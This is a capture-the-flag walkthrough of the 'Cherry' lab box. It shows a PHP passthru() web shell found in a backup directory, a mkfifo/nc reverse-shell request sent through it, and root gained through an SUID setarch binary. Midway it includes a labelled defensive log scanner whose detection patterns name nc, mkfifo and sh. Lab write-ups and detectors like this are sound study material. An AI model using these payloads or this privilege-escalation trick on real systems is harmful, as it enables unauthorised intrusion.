Difficulty: Easy
Tested: VMware Workstation 15.x Pro (this works better with VMware than with VirtualBox)
Goal: get a root shell (i.e. root@localhost:~#) and then obtain the flag under /root.

This is another easy rated box from the same people who made Chili.


This time we get four ports:

  1. 22/tcp open ssh
  2. 80/tcp open http
  3. 7755/tcp open unknown
  4. 33060/tcp open mysqlx

With a detailed scan we find out that port 80 is running nginx and port 7755 is another HTTP server, but this time it's Apache. Nmap can't identify the service on port 33060 with confidence, although it guesses mysqlx.


Fuzzing for subdomains turns up nothing, and gobusting turns up just a single directory: /backup. We get a picture of a cherry from the front page of both webservers, but this time I didn't bother trying stego techniques on it. The two webservers appear basically identical, except that on Apache we can access /backup whereas on nginx it's forbidden.

So, what’s in backup? This stuff:

  1. command.php 2020-09-07 03:30 293
  2. latest.tar.gz 2020-09-01 18:54 12M
  3. 2020-09-07 03:33 11M
  4. 2020-09-07 03:34 11M

We download these files, and the interesting one is command.php. Here’s what it contains:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- <?php echo passthru($_GET['backup']); ?> -->

Hmm. The PHP still runs even though it sits inside an HTML comment, so what happens if we put a command in the backup parameter?

Response: www-data

So this gives us our RCE.


I used Burp Suite with the following payload:

GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f HTTP/1.1

to get a shell, and then I ran LinPEAS.
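Seen from the defending side, the useful property of command.php is that every request carrying a backup parameter is a command execution, so the attack is visible in the web server's access log. The following is an added example, not part of the write-up, that parses constructed Apache-style log lines and flags those requests; the sample lines, the parser and the severity rules are my own assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Minimal matcher for one Apache/nginx "combined" access-log line (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Shell metacharacters plus the tools used in the write-up's payload. Their presence in the
# decoded parameter value raises the alert from plain command execution to reverse shell.
SHELL_META = re.compile(r'[;|&`$<>]|\b(mkfifo|nc|ncat|sh|bash)\b')

# Constructed sample log lines; the third one is the write-up's request as the server logs it.
SAMPLE_LOG = """\
10.0.2.15 - - [07/Sep/2020:04:10:01 +0000] "GET /backup/ HTTP/1.1" 200 1043 "-" "curl/7.68.0"
10.0.2.15 - - [07/Sep/2020:04:10:05 +0000] "GET /backup/command.php?backup=whoami HTTP/1.1" 200 9 "-" "curl/7.68.0"
10.0.2.15 - - [07/Sep/2020:04:10:20 +0000] "GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.2.15 - - [07/Sep/2020:04:11:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""

def analyse_line(line):
    """Return an alert dict for a request that reaches command.php's backup parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    if url.path != '/backup/command.php':
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent- and plus-decodes the value
    if 'backup' not in params:
        return None
    cmd = params['backup'][0]
    severity = 'high' if SHELL_META.search(cmd) else 'medium'
    return {'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
            'command': cmd, 'severity': severity}

def scan_log(text):
    """Run analyse_line over every line of an access log and keep the alerts, in order."""
    return [a for a in map(analyse_line, text.splitlines()) if a]

if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(f"[{alert['severity']:<6}] {alert['time']} {alert['ip']} ran: {alert['command']}")
```

The same check run over the nginx log would show the /backup requests answered with 403, which is the recon step before the Apache hit.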


LinPEAS points at an SUID binary; this time it's setarch.

$ setarch $(arch) /bin/sh -p
cd /root
ls -lash
total 44K
4.0K drwx------  5 root root 4.0K Sep  7 04:21 .
4.0K drwxr-xr-x 20 root root 4.0K Sep  7 02:18 ..
4.0K -rw-------  1 root root  164 Sep  7 04:21 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:33 .local
4.0K -rw-------  1 root root   18 Sep  7 02:37 .mysql_history
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K drwx------  2 root root 4.0K Sep  7 02:21 .ssh
4.0K -rw-r--r--  1 root root  255 Sep  7 04:13 .wget-hsts
4.0K -rw-r--r--  1 root root   46 Sep  7 04:20 proof.txt
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:21 snap
cat proof.txt

So yes, it was easy after all.